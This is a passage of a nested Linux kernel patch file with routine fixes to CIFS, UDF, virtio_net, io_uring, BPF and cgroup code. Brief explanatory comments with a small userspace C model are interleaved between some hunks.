+ out_destroy_cifsoplockd_wq:
+@@ -1949,8 +1951,6 @@ init_cifs(void)
+ 	destroy_workqueue(decrypt_wq);
+ out_destroy_cifsiod_wq:
+ 	destroy_workqueue(cifsiod_wq);
+-out_destroy_serverclose_wq:
+-	destroy_workqueue(serverclose_wq);
+ out_clean_proc:
+ 	cifs_proc_clean();
+ 	return rc;
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 8c2a784200ec2..21b344762d0f8 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -2592,6 +2592,13 @@ cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 			cifs_dbg(VFS, "Server does not support mounting with posix SMB3.11 extensions\n");
+ 			rc = -EOPNOTSUPP;
+ 			goto out_fail;
++		} else if (ses->server->vals->protocol_id == SMB10_PROT_ID)
++			if (cap_unix(ses))
++				cifs_dbg(FYI, "Unix Extensions requested on SMB1 mount\n");
++			else {
++				cifs_dbg(VFS, "SMB1 Unix Extensions not supported by server\n");
++				rc = -EOPNOTSUPP;
++				goto out_fail;
+ 		} else {
+ 			cifs_dbg(VFS, "Check vers= mount option. SMB3.11 "
+ 				"disabled but required for POSIX extensions\n");
+@@ -3975,6 +3982,7 @@ int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+ }
+ #endif
+ 
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+ /*
+  * Issue a TREE_CONNECT request.
+  */
+@@ -4096,11 +4104,25 @@ CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
+ 		else
+ 			tcon->Flags = 0;
+ 		cifs_dbg(FYI, "Tcon flags: 0x%x\n", tcon->Flags);
+-	}
+ 
++		/*
++		 * reset_cifs_unix_caps calls QFSInfo which requires
++		 * need_reconnect to be false, but we would not need to call
++		 * reset_caps if this were not a reconnect case so must check
++		 * need_reconnect flag here.  The caller will also clear
++		 * need_reconnect when tcon was successful but needed to be
++		 * cleared earlier in the case of unix extensions reconnect
++		 */
++		if (tcon->need_reconnect && tcon->unix_ext) {
++			cifs_dbg(FYI, "resetting caps for %s\n", tcon->tree_name);
++			tcon->need_reconnect = false;
++			reset_cifs_unix_caps(xid, tcon, NULL, NULL);
++		}
++	}
+ 	cifs_buf_release(smb_buffer);
+ 	return rc;
+ }
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+ 
+ static void delayed_free(struct rcu_head *p)
+ {
+diff --git a/fs/super.c b/fs/super.c
+index d138332e57a94..b116f72cd122a 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -569,6 +569,17 @@ struct super_block *sget_fc(struct fs_context *fc,
+ 	struct user_namespace *user_ns = fc->global ? &init_user_ns : fc->user_ns;
+ 	int err;
+ 
++	/*
++	 * Never allow s_user_ns != &init_user_ns when FS_USERNS_MOUNT is
++	 * not set, as the filesystem is likely unprepared to handle it.
++	 * This can happen when fsconfig() is called from init_user_ns with
++	 * an fs_fd opened in another user namespace.
++	 */
++	if (user_ns != &init_user_ns && !(fc->fs_type->fs_flags & FS_USERNS_MOUNT)) {
++		errorfc(fc, "VFS: Mounting from non-initial user namespace is not allowed");
++		return ERR_PTR(-EPERM);
++	}
++
+ retry:
+ 	spin_lock(&sb_lock);
+ 	if (test) {
+diff --git a/fs/udf/balloc.c b/fs/udf/balloc.c
+index f416b7fe092fc..c4c18eeacb60c 100644
+--- a/fs/udf/balloc.c
++++ b/fs/udf/balloc.c
+@@ -68,8 +68,12 @@ static int read_block_bitmap(struct super_block *sb,
+ 	}
+ 
+ 	for (i = 0; i < count; i++)
+-		if (udf_test_bit(i + off, bh->b_data))
++		if (udf_test_bit(i + off, bh->b_data)) {
++			bitmap->s_block_bitmap[bitmap_nr] =
++							ERR_PTR(-EFSCORRUPTED);
++			brelse(bh);
+ 			return -EFSCORRUPTED;
++		}
+ 	return 0;
+ }
+ 
+@@ -85,8 +89,15 @@ static int __load_block_bitmap(struct super_block *sb,
+ 			  block_group, nr_groups);
+ 	}
+ 
+-	if (bitmap->s_block_bitmap[block_group])
++	if (bitmap->s_block_bitmap[block_group]) {
++		/*
++		 * The bitmap failed verification in the past. No point in
++		 * trying again.
++		 */
++		if (IS_ERR(bitmap->s_block_bitmap[block_group]))
++			return PTR_ERR(bitmap->s_block_bitmap[block_group]);
+ 		return block_group;
++	}
+ 
+ 	retval = read_block_bitmap(sb, bitmap, block_group, block_group);
+ 	if (retval < 0)
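The hunks above cache a failed verification by parking an ERR_PTR() in the bitmap slot itself, giving the slot three states: NULL (not loaded yet), error-encoded pointer (known bad, don't retry), or a valid buffer head. A self-contained model of the pattern (the ERR_PTR helpers are re-derived for userspace; -EUCLEAN stands in for the kernel's EFSCORRUPTED):

#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_ERRNO	4095
#define ERR_PTR(err)	((void *)(intptr_t)(err))
#define PTR_ERR(ptr)	((int)(intptr_t)(ptr))
#define IS_ERR(ptr)	((uintptr_t)(ptr) >= (uintptr_t)-MAX_ERRNO)

static void *slot;	/* like bitmap->s_block_bitmap[i] */

static int load_once(void)
{
	if (slot) {
		if (IS_ERR(slot))
			return PTR_ERR(slot);	/* don't re-read a known-bad bitmap */
		return 0;			/* already loaded */
	}
	slot = ERR_PTR(-EUCLEAN);		/* pretend verification failed; remember it */
	return -EUCLEAN;
}

int main(void)
{
	printf("%d\n", load_once());	/* -117: first failure */
	printf("%d\n", load_once());	/* -117 again, served from the cached error */
	return 0;
}
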
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 6dc9d8dad88eb..65fbc60a88e44 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -266,7 +266,8 @@ static void udf_sb_free_bitmap(struct udf_bitmap *bitmap)
+ 	int nr_groups = bitmap->s_nr_groups;
+ 
+ 	for (i = 0; i < nr_groups; i++)
+-		brelse(bitmap->s_block_bitmap[i]);
++		if (!IS_ERR_OR_NULL(bitmap->s_block_bitmap[i]))
++			brelse(bitmap->s_block_bitmap[i]);
+ 
+ 	kvfree(bitmap);
+ }
+diff --git a/include/asm-generic/vmlinux.lds.h b/include/asm-generic/vmlinux.lds.h
+index 1d1f480a5e9e4..e7539dc024981 100644
+--- a/include/asm-generic/vmlinux.lds.h
++++ b/include/asm-generic/vmlinux.lds.h
+@@ -101,7 +101,7 @@
+ #define DATA_MAIN .data .data.[0-9a-zA-Z_]* .data..L* .data..compoundliteral* .data.$__unnamed_* .data.$L*
+ #define SDATA_MAIN .sdata .sdata.[0-9a-zA-Z_]*
+ #define RODATA_MAIN .rodata .rodata.[0-9a-zA-Z_]* .rodata..L*
+-#define BSS_MAIN .bss .bss.[0-9a-zA-Z_]* .bss..compoundliteral*
++#define BSS_MAIN .bss .bss.[0-9a-zA-Z_]* .bss..L* .bss..compoundliteral*
+ #define SBSS_MAIN .sbss .sbss.[0-9a-zA-Z_]*
+ #else
+ #define TEXT_MAIN .text
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 66a7e01c62608..1a921e8943a03 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -309,15 +309,18 @@ int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
+  * @cmd: Command
+  * @seq: buffer containing data to be transmitted
+  */
+-#define mipi_dsi_dcs_write_seq(dsi, cmd, seq...) do {				\
+-		static const u8 d[] = { cmd, seq };				\
+-		struct device *dev = &dsi->dev;	\
+-		int ret;						\
+-		ret = mipi_dsi_dcs_write_buffer(dsi, d, ARRAY_SIZE(d));	\
+-		if (ret < 0) {						\
+-			dev_err_ratelimited(dev, "sending command %#02x failed: %d\n", cmd, ret); \
+-			return ret;						\
+-		}						\
++#define mipi_dsi_dcs_write_seq(dsi, cmd, seq...)                            \
++	do {                                                                \
++		static const u8 d[] = { cmd, seq };                         \
++		struct device *dev = &dsi->dev;                             \
++		ssize_t ret;                                                \
++		ret = mipi_dsi_dcs_write_buffer(dsi, d, ARRAY_SIZE(d));     \
++		if (ret < 0) {                                              \
++			dev_err_ratelimited(                                \
++				dev, "sending command %#02x failed: %zd\n", \
++				cmd, ret);                                  \
++			return ret;                                         \
++		}                                                           \
+ 	} while (0)
+ 
+ /**
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index f080ccf27d256..6a524c5462a6f 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -645,7 +645,7 @@ static inline u32 type_flag(u32 type)
+ /* only use after check_attach_btf_id() */
+ static inline enum bpf_prog_type resolve_prog_type(const struct bpf_prog *prog)
+ {
+-	return prog->type == BPF_PROG_TYPE_EXT ?
++	return (prog->type == BPF_PROG_TYPE_EXT && prog->aux->dst_prog) ?
+ 		prog->aux->dst_prog->type : prog->type;
+ }
+ 
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 37eeef9841c4e..cc555072940f9 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -694,6 +694,7 @@ HPAGEFLAG(RawHwpUnreliable, raw_hwp_unreliable)
+ /* Defines one hugetlb page size */
+ struct hstate {
+ 	struct mutex resize_lock;
++	struct lock_class_key resize_key;
+ 	int next_nid_to_alloc;
+ 	int next_nid_to_free;
+ 	unsigned int order;
+diff --git a/include/linux/jbd2.h b/include/linux/jbd2.h
+index 6611af5f1d0c6..e301d323108d1 100644
+--- a/include/linux/jbd2.h
++++ b/include/linux/jbd2.h
+@@ -1665,11 +1665,6 @@ int jbd2_wait_inode_data(journal_t *journal, struct jbd2_inode *jinode);
+ int jbd2_fc_wait_bufs(journal_t *journal, int num_blks);
+ int jbd2_fc_release_bufs(journal_t *journal);
+ 
+-static inline int jbd2_journal_get_max_txn_bufs(journal_t *journal)
+-{
+-	return (journal->j_total_len - journal->j_fc_wbufsize) / 4;
+-}
+-
+ /*
+  * is_journal_abort
+  *
+diff --git a/include/linux/jump_label.h b/include/linux/jump_label.h
+index 570831ca99518..4e968ebadce60 100644
+--- a/include/linux/jump_label.h
++++ b/include/linux/jump_label.h
+@@ -224,9 +224,10 @@ extern bool arch_jump_label_transform_queue(struct jump_entry *entry,
+ 					    enum jump_label_type type);
+ extern void arch_jump_label_transform_apply(void);
+ extern int jump_label_text_reserved(void *start, void *end);
+-extern void static_key_slow_inc(struct static_key *key);
++extern bool static_key_slow_inc(struct static_key *key);
++extern bool static_key_fast_inc_not_disabled(struct static_key *key);
+ extern void static_key_slow_dec(struct static_key *key);
+-extern void static_key_slow_inc_cpuslocked(struct static_key *key);
++extern bool static_key_slow_inc_cpuslocked(struct static_key *key);
+ extern void static_key_slow_dec_cpuslocked(struct static_key *key);
+ extern int static_key_count(struct static_key *key);
+ extern void static_key_enable(struct static_key *key);
+@@ -278,11 +279,23 @@ static __always_inline bool static_key_true(struct static_key *key)
+ 	return false;
+ }
+ 
+-static inline void static_key_slow_inc(struct static_key *key)
++static inline bool static_key_fast_inc_not_disabled(struct static_key *key)
+ {
++	int v;
++
+ 	STATIC_KEY_CHECK_USE(key);
+-	atomic_inc(&key->enabled);
++	/*
++	 * Prevent key->enabled getting negative to follow the same semantics
++	 * as for CONFIG_JUMP_LABEL=y, see kernel/jump_label.c comment.
++	 */
++	v = atomic_read(&key->enabled);
++	do {
++		if (v < 0 || (v + 1) < 0)
++			return false;
++	} while (!likely(atomic_try_cmpxchg(&key->enabled, &v, v + 1)));
++	return true;
+ }
++#define static_key_slow_inc(key)	static_key_fast_inc_not_disabled(key)
+ 
+ static inline void static_key_slow_dec(struct static_key *key)
+ {
+diff --git a/include/linux/mlx5/qp.h b/include/linux/mlx5/qp.h
+index ca0eee571ad7b..15e8d7fd3879f 100644
+--- a/include/linux/mlx5/qp.h
++++ b/include/linux/mlx5/qp.h
+@@ -566,9 +566,12 @@ static inline const char *mlx5_qp_state_str(int state)
+ 
+ static inline int mlx5_get_qp_default_ts(struct mlx5_core_dev *dev)
+ {
+-	return !MLX5_CAP_ROCE(dev, qp_ts_format) ?
+-		       MLX5_TIMESTAMP_FORMAT_FREE_RUNNING :
+-		       MLX5_TIMESTAMP_FORMAT_DEFAULT;
++	u8 supported_ts_cap = mlx5_get_roce_state(dev) ?
++			      MLX5_CAP_ROCE(dev, qp_ts_format) :
++			      MLX5_CAP_GEN(dev, sq_ts_format);
++
++	return supported_ts_cap ? MLX5_TIMESTAMP_FORMAT_DEFAULT :
++	       MLX5_TIMESTAMP_FORMAT_FREE_RUNNING;
+ }
+ 
+ #endif /* MLX5_QP_H */
+diff --git a/include/linux/objagg.h b/include/linux/objagg.h
+index 78021777df462..6df5b887dc547 100644
+--- a/include/linux/objagg.h
++++ b/include/linux/objagg.h
+@@ -8,7 +8,6 @@ struct objagg_ops {
+ 	size_t obj_size;
+ 	bool (*delta_check)(void *priv, const void *parent_obj,
+ 			    const void *obj);
+-	int (*hints_obj_cmp)(const void *obj1, const void *obj2);
+ 	void * (*delta_create)(void *priv, void *parent_obj, void *obj);
+ 	void (*delta_destroy)(void *priv, void *delta_priv);
+ 	void * (*root_create)(void *priv, void *obj, unsigned int root_id);
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 4da7411da9baf..df73fb26b8250 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1138,6 +1138,7 @@ int pci_get_interrupt_pin(struct pci_dev *dev, struct pci_dev **bridge);
+ u8 pci_common_swizzle(struct pci_dev *dev, u8 *pinp);
+ struct pci_dev *pci_dev_get(struct pci_dev *dev);
+ void pci_dev_put(struct pci_dev *dev);
++DEFINE_FREE(pci_dev_put, struct pci_dev *, if (_T) pci_dev_put(_T))
+ void pci_remove_bus(struct pci_bus *b);
+ void pci_stop_and_remove_bus_device(struct pci_dev *dev);
+ void pci_stop_and_remove_bus_device_locked(struct pci_dev *dev);
+@@ -1746,6 +1747,7 @@ void pci_cfg_access_unlock(struct pci_dev *dev);
+ void pci_dev_lock(struct pci_dev *dev);
+ int pci_dev_trylock(struct pci_dev *dev);
+ void pci_dev_unlock(struct pci_dev *dev);
++DEFINE_GUARD(pci_dev, struct pci_dev *, pci_dev_lock(_T), pci_dev_unlock(_T))
+ 
+ /*
+  * PCI domain support.  Sometimes called PCI segment (eg by ACPI),
+diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
+index 1578a4de1f3cb..27b694552d58b 100644
+--- a/include/linux/perf_event.h
++++ b/include/linux/perf_event.h
+@@ -765,6 +765,7 @@ struct perf_event {
+ 	struct irq_work			pending_irq;
+ 	struct callback_head		pending_task;
+ 	unsigned int			pending_work;
++	struct rcuwait			pending_work_wait;
+ 
+ 	atomic_t			event_limit;
+ 
+diff --git a/include/linux/sbitmap.h b/include/linux/sbitmap.h
+index d662cf136021d..c09cdcc99471e 100644
+--- a/include/linux/sbitmap.h
++++ b/include/linux/sbitmap.h
+@@ -36,6 +36,11 @@ struct sbitmap_word {
+ 	 * @cleared: word holding cleared bits
+ 	 */
+ 	unsigned long cleared ____cacheline_aligned_in_smp;
++
++	/**
++	 * @swap_lock: serializes simultaneous updates of ->word and ->cleared
++	 */
++	spinlock_t swap_lock;
+ } ____cacheline_aligned_in_smp;
+ 
+ /**
+diff --git a/include/linux/task_work.h b/include/linux/task_work.h
+index 795ef5a684294..26b8a47f41fca 100644
+--- a/include/linux/task_work.h
++++ b/include/linux/task_work.h
+@@ -30,7 +30,8 @@ int task_work_add(struct task_struct *task, struct callback_head *twork,
+ 
+ struct callback_head *task_work_cancel_match(struct task_struct *task,
+ 	bool (*match)(struct callback_head *, void *data), void *data);
+-struct callback_head *task_work_cancel(struct task_struct *, task_work_func_t);
++struct callback_head *task_work_cancel_func(struct task_struct *, task_work_func_t);
++bool task_work_cancel(struct task_struct *task, struct callback_head *cb);
+ void task_work_run(void);
+ 
+ static inline void exit_task_work(struct task_struct *task)
+diff --git a/include/linux/virtio_net.h b/include/linux/virtio_net.h
+index 6047058d67037..29b19d0a324c7 100644
+--- a/include/linux/virtio_net.h
++++ b/include/linux/virtio_net.h
+@@ -51,6 +51,7 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 	unsigned int thlen = 0;
+ 	unsigned int p_off = 0;
+ 	unsigned int ip_proto;
++	u64 ret, remainder, gso_size;
+ 
+ 	if (hdr->gso_type != VIRTIO_NET_HDR_GSO_NONE) {
+ 		switch (hdr->gso_type & ~VIRTIO_NET_HDR_GSO_ECN) {
+@@ -87,6 +88,16 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 		u32 off = __virtio16_to_cpu(little_endian, hdr->csum_offset);
+ 		u32 needed = start + max_t(u32, thlen, off + sizeof(__sum16));
+ 
++		if (hdr->gso_size) {
++			gso_size = __virtio16_to_cpu(little_endian, hdr->gso_size);
++			ret = div64_u64_rem(skb->len, gso_size, &remainder);
++			if (!(ret && (hdr->gso_size > needed) &&
++						((remainder > needed) || (remainder == 0)))) {
++				return -EINVAL;
++			}
++			skb_shinfo(skb)->tx_flags |= SKBFL_SHARED_FRAG;
++		}
++
+ 		if (!pskb_may_pull(skb, needed))
+ 			return -EINVAL;
+ 
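
The added hdr->gso_size validation is plain arithmetic: the packet must
split into at least one full segment, the claimed segment size must exceed
the header bytes ("needed"), and a non-empty tail segment must still cover
them. A hedged restatement in standalone C; gso_len_is_sane() is an
illustrative name, not a kernel function:

#include <stdbool.h>
#include <stdint.h>

static bool gso_len_is_sane(uint64_t skb_len, uint64_t gso_size,
			    uint64_t needed)
{
	if (gso_size == 0)
		return true;	/* no GSO metadata to validate */

	uint64_t segs = skb_len / gso_size;	/* div64_u64_rem() quotient */
	uint64_t remainder = skb_len % gso_size;

	return segs != 0 && gso_size > needed &&
	       (remainder == 0 || remainder > needed);
}
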
+diff --git a/include/net/ip_fib.h b/include/net/ip_fib.h
+index 15de07d365405..ca1700c2a5733 100644
+--- a/include/net/ip_fib.h
++++ b/include/net/ip_fib.h
+@@ -173,6 +173,7 @@ struct fib_result {
+ 	unsigned char		type;
+ 	unsigned char		scope;
+ 	u32			tclassid;
++	dscp_t			dscp;
+ 	struct fib_nh_common	*nhc;
+ 	struct fib_info		*fi;
+ 	struct fib_table	*table;
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 8ea1fba84eff9..cc314c383c532 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -633,6 +633,7 @@ void tcp_skb_collapse_tstamp(struct sk_buff *skb,
+ /* tcp_input.c */
+ void tcp_rearm_rto(struct sock *sk);
+ void tcp_synack_rtt_meas(struct sock *sk, struct request_sock *req);
++void tcp_done_with_error(struct sock *sk, int err);
+ void tcp_reset(struct sock *sk, struct sk_buff *skb);
+ void tcp_skb_mark_lost_uncond_verify(struct tcp_sock *tp, struct sk_buff *skb);
+ void tcp_fin(struct sock *sk);
+diff --git a/include/trace/events/rpcgss.h b/include/trace/events/rpcgss.h
+index 894d9fc8bd94a..e228a44af2915 100644
+--- a/include/trace/events/rpcgss.h
++++ b/include/trace/events/rpcgss.h
+@@ -54,7 +54,7 @@ TRACE_DEFINE_ENUM(GSS_S_UNSEQ_TOKEN);
+ TRACE_DEFINE_ENUM(GSS_S_GAP_TOKEN);
+ 
+ #define show_gss_status(x)						\
+-	__print_flags(x, "|",						\
++	__print_symbolic(x, 						\
+ 		{ GSS_S_BAD_MECH, "GSS_S_BAD_MECH" },			\
+ 		{ GSS_S_BAD_NAME, "GSS_S_BAD_NAME" },			\
+ 		{ GSS_S_BAD_NAMETYPE, "GSS_S_BAD_NAMETYPE" },		\
+diff --git a/include/uapi/linux/netfilter/nf_tables.h b/include/uapi/linux/netfilter/nf_tables.h
+index 707af820f1a97..672b2e1b47f24 100644
+--- a/include/uapi/linux/netfilter/nf_tables.h
++++ b/include/uapi/linux/netfilter/nf_tables.h
+@@ -1324,7 +1324,7 @@ enum nft_secmark_attributes {
+ #define NFTA_SECMARK_MAX	(__NFTA_SECMARK_MAX - 1)
+ 
+ /* Max security context length */
+-#define NFT_SECMARK_CTX_MAXLEN		256
++#define NFT_SECMARK_CTX_MAXLEN		4096
+ 
+ /**
+  * enum nft_reject_types - nf_tables reject expression reject types
+diff --git a/include/uapi/linux/zorro_ids.h b/include/uapi/linux/zorro_ids.h
+index 6e574d7b7d79c..393f2ee9c0422 100644
+--- a/include/uapi/linux/zorro_ids.h
++++ b/include/uapi/linux/zorro_ids.h
+@@ -449,6 +449,9 @@
+ #define  ZORRO_PROD_VMC_ISDN_BLASTER_Z2				ZORRO_ID(VMC, 0x01, 0)
+ #define  ZORRO_PROD_VMC_HYPERCOM_4				ZORRO_ID(VMC, 0x02, 0)
+ 
++#define ZORRO_MANUF_CSLAB					0x1400
++#define  ZORRO_PROD_CSLAB_WARP_1260				ZORRO_ID(CSLAB, 0x65, 0)
++
+ #define ZORRO_MANUF_INFORMATION					0x157C
+ #define  ZORRO_PROD_INFORMATION_ISDN_ENGINE_I			ZORRO_ID(INFORMATION, 0x64, 0)
+ 
+diff --git a/io_uring/io-wq.c b/io_uring/io-wq.c
+index 98ac9dbcec2f5..04503118cdc10 100644
+--- a/io_uring/io-wq.c
++++ b/io_uring/io-wq.c
+@@ -22,6 +22,7 @@
+ #include "io_uring.h"
+ 
+ #define WORKER_IDLE_TIMEOUT	(5 * HZ)
++#define WORKER_INIT_LIMIT	3
+ 
+ enum {
+ 	IO_WORKER_F_UP		= 1,	/* up and active */
+@@ -58,6 +59,7 @@ struct io_worker {
+ 	unsigned long create_state;
+ 	struct callback_head create_work;
+ 	int create_index;
++	int init_retries;
+ 
+ 	union {
+ 		struct rcu_head rcu;
+@@ -729,7 +731,7 @@ static bool io_wq_work_match_all(struct io_wq_work *work, void *data)
+ 	return true;
+ }
+ 
+-static inline bool io_should_retry_thread(long err)
++static inline bool io_should_retry_thread(struct io_worker *worker, long err)
+ {
+ 	/*
+ 	 * Prevent perpetual task_work retry, if the task (or its group) is
+@@ -737,6 +739,8 @@ static inline bool io_should_retry_thread(long err)
+ 	 */
+ 	if (fatal_signal_pending(current))
+ 		return false;
++	if (worker->init_retries++ >= WORKER_INIT_LIMIT)
++		return false;
+ 
+ 	switch (err) {
+ 	case -EAGAIN:
+@@ -763,7 +767,7 @@ static void create_worker_cont(struct callback_head *cb)
+ 		io_init_new_worker(wqe, worker, tsk);
+ 		io_worker_release(worker);
+ 		return;
+-	} else if (!io_should_retry_thread(PTR_ERR(tsk))) {
++	} else if (!io_should_retry_thread(worker, PTR_ERR(tsk))) {
+ 		struct io_wqe_acct *acct = io_wqe_get_acct(worker);
+ 
+ 		atomic_dec(&acct->nr_running);
+@@ -830,7 +834,7 @@ static bool create_io_worker(struct io_wq *wq, struct io_wqe *wqe, int index)
+ 	tsk = create_io_thread(io_wqe_worker, worker, wqe->node);
+ 	if (!IS_ERR(tsk)) {
+ 		io_init_new_worker(wqe, worker, tsk);
+-	} else if (!io_should_retry_thread(PTR_ERR(tsk))) {
++	} else if (!io_should_retry_thread(worker, PTR_ERR(tsk))) {
+ 		kfree(worker);
+ 		goto fail;
+ 	} else {
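
Retry handling now carries per-worker state: transient thread-creation
errors are still retried, but at most WORKER_INIT_LIMIT times, so a
persistently failing create_io_thread() can no longer loop forever. The
shape of the predicate, modeled in userspace with illustrative error
values:

#include <stdbool.h>
#include <errno.h>

#define WORKER_INIT_LIMIT 3

struct worker {
	int init_retries;
};

static bool should_retry(struct worker *w, long err)
{
	/* Give up once the bounded retry budget is spent. */
	if (w->init_retries++ >= WORKER_INIT_LIMIT)
		return false;

	switch (err) {
	case -EAGAIN:	/* treated as transient, worth retrying */
	case -EINTR:
		return true;
	default:
		return false;
	}
}
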
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 958c3b6190205..b21f2bafaeb04 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -3000,8 +3000,11 @@ __cold void io_uring_cancel_generic(bool cancel_all, struct io_sq_data *sqd)
+ 		bool loop = false;
+ 
+ 		io_uring_drop_tctx_refs(current);
++		if (!tctx_inflight(tctx, !cancel_all))
++			break;
++
+ 		/* read completions before cancelations */
+-		inflight = tctx_inflight(tctx, !cancel_all);
++		inflight = tctx_inflight(tctx, false);
+ 		if (!inflight)
+ 			break;
+ 
+diff --git a/io_uring/timeout.c b/io_uring/timeout.c
+index b0cf05ebcbcc3..7cdc234c5f53f 100644
+--- a/io_uring/timeout.c
++++ b/io_uring/timeout.c
+@@ -601,7 +601,7 @@ void io_queue_linked_timeout(struct io_kiocb *req)
+ 
+ static bool io_match_task(struct io_kiocb *head, struct task_struct *task,
+ 			  bool cancel_all)
+-	__must_hold(&req->ctx->timeout_lock)
++	__must_hold(&head->ctx->timeout_lock)
+ {
+ 	struct io_kiocb *req;
+ 
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 7582ec4fd4131..bb88fd2266a86 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -378,7 +378,7 @@ const char *btf_type_str(const struct btf_type *t)
+ struct btf_show {
+ 	u64 flags;
+ 	void *target;	/* target of show operation (seq file, buffer) */
+-	void (*showfn)(struct btf_show *show, const char *fmt, va_list args);
++	__printf(2, 0) void (*showfn)(struct btf_show *show, const char *fmt, va_list args);
+ 	const struct btf *btf;
+ 	/* below are used during iteration */
+ 	struct {
+@@ -6792,8 +6792,8 @@ static void btf_type_show(const struct btf *btf, u32 type_id, void *obj,
+ 	btf_type_ops(t)->show(btf, t, type_id, obj, 0, show);
+ }
+ 
+-static void btf_seq_show(struct btf_show *show, const char *fmt,
+-			 va_list args)
++__printf(2, 0) static void btf_seq_show(struct btf_show *show, const char *fmt,
++					va_list args)
+ {
+ 	seq_vprintf((struct seq_file *)show->target, fmt, args);
+ }
+@@ -6826,8 +6826,8 @@ struct btf_show_snprintf {
+ 	int len;		/* length we would have written */
+ };
+ 
+-static void btf_snprintf_show(struct btf_show *show, const char *fmt,
+-			      va_list args)
++__printf(2, 0) static void btf_snprintf_show(struct btf_show *show, const char *fmt,
++					     va_list args)
+ {
+ 	struct btf_show_snprintf *ssnprintf = (struct btf_show_snprintf *)show;
+ 	int len;
+diff --git a/kernel/bpf/dispatcher.c b/kernel/bpf/dispatcher.c
+index c19719f48ce06..fa3e9225aedc0 100644
+--- a/kernel/bpf/dispatcher.c
++++ b/kernel/bpf/dispatcher.c
+@@ -125,6 +125,11 @@ static void bpf_dispatcher_update(struct bpf_dispatcher *d, int prev_num_progs)
+ 
+ 	__BPF_DISPATCHER_UPDATE(d, new ?: (void *)&bpf_dispatcher_nop_func);
+ 
++	/* Make sure all the callers executing the previous/old half of the
++	 * image leave it, so following update call can modify it safely.
++	 */
++	synchronize_rcu();
++
+ 	if (new)
+ 		d->image_off = noff;
+ }
+diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
+index 289cc873cb719..c2d28ffee3b7b 100644
+--- a/kernel/cgroup/cgroup-v1.c
++++ b/kernel/cgroup/cgroup-v1.c
+@@ -802,7 +802,7 @@ void cgroup1_release_agent(struct work_struct *work)
+ 		goto out_free;
+ 
+ 	ret = cgroup_path_ns(cgrp, pathbuf, PATH_MAX, &init_cgroup_ns);
+-	if (ret < 0 || ret >= PATH_MAX)
++	if (ret < 0)
+ 		goto out_free;
+ 
+ 	argv[0] = agentbuf;
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 97ecca43386d9..1e008ea467c0a 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1910,7 +1910,7 @@ int cgroup_show_path(struct seq_file *sf, struct kernfs_node *kf_node,
+ 	len = kernfs_path_from_node(kf_node, ns_cgroup->kn, buf, PATH_MAX);
+ 	spin_unlock_irq(&css_set_lock);
+ 
+-	if (len >= PATH_MAX)
++	if (len == -E2BIG)
+ 		len = -ERANGE;
+ 	else if (len > 0) {
+ 		seq_escape(sf, buf, " \t\n\\");
+@@ -6287,7 +6287,7 @@ int proc_cgroup_show(struct seq_file *m, struct pid_namespace *ns,
+ 		if (cgroup_on_dfl(cgrp) || !(tsk->flags & PF_EXITING)) {
+ 			retval = cgroup_path_ns_locked(cgrp, buf, PATH_MAX,
+ 						current->nsproxy->cgroup_ns);
+-			if (retval >= PATH_MAX)
++			if (retval == -E2BIG)
+ 				retval = -ENAMETOOLONG;
+ 			if (retval < 0)
+ 				goto out_unlock;
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index 01f5a019e0f54..370a6bce20a80 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -21,6 +21,7 @@
+  *  License.  See the file COPYING in the main directory of the Linux
+  *  distribution for more details.
+  */
++#include "cgroup-internal.h"
+ 
+ #include <linux/cpu.h>
+ #include <linux/cpumask.h>
+@@ -4213,11 +4214,15 @@ int proc_cpuset_show(struct seq_file *m, struct pid_namespace *ns,
+ 	if (!buf)
+ 		goto out;
+ 
+-	css = task_get_css(tsk, cpuset_cgrp_id);
+-	retval = cgroup_path_ns(css->cgroup, buf, PATH_MAX,
+-				current->nsproxy->cgroup_ns);
+-	css_put(css);
+-	if (retval >= PATH_MAX)
++	rcu_read_lock();
++	spin_lock_irq(&css_set_lock);
++	css = task_css(tsk, cpuset_cgrp_id);
++	retval = cgroup_path_ns_locked(css->cgroup, buf, PATH_MAX,
++				       current->nsproxy->cgroup_ns);
++	spin_unlock_irq(&css_set_lock);
++	rcu_read_unlock();
++
++	if (retval == -E2BIG)
+ 		retval = -ENAMETOOLONG;
+ 	if (retval < 0)
+ 		goto out_free;
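
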